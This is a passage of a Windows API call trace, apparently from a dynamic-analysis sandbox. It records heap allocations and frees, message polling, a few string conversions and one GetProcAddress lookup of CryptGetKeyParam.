(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0075.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0075.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0075.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0075.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0075.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0075.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0075.456] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0075.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0075.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0075.457] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0075.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0075.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0075.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0075.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0075.457] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0075.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0075.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0075.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0075.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0075.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0075.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0075.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0075.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0075.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0075.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0075.457] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0075.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0075.457] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0075.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0075.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0075.457] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0075.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0075.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0075.458] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0075.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.458] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0075.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0075.459] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0075.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0075.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0075.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0075.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0075.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0075.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0075.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0075.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0075.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0075.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0075.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0075.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0075.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0075.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0075.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0075.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0075.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0075.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0075.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0075.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0075.459] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0075.459] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0075.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0075.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0075.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0075.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0075.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0075.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0075.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0075.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0075.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0075.460] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0075.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0075.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0075.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0075.461] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0075.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0075.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0075.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0075.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0075.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0075.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0075.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0075.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0075.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0075.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0075.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0075.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0075.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0075.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0075.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e48 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0075.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0075.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0075.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0075.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0075.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0075.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0075.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0075.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0075.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0075.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0075.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0075.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0075.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0075.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0075.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0075.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0075.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0075.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0075.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0075.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0075.463] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0075.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0075.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0075.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0075.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0075.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0075.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0075.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0075.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0075.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0075.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0075.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0075.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0075.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0075.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0075.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0075.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0075.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0075.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0075.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0075.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0075.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0075.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0075.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0075.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0075.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0075.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0075.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0075.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0075.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0075.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0075.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0075.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0075.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0075.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0075.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0075.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0075.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0075.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0075.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0075.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0075.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0075.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0075.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0075.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0075.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0075.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0075.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0075.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0075.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0075.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0075.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0075.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0075.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0075.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796e88 [0075.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0075.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0075.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0075.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0075.466] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0075.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0075.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0075.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0075.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0075.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0075.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 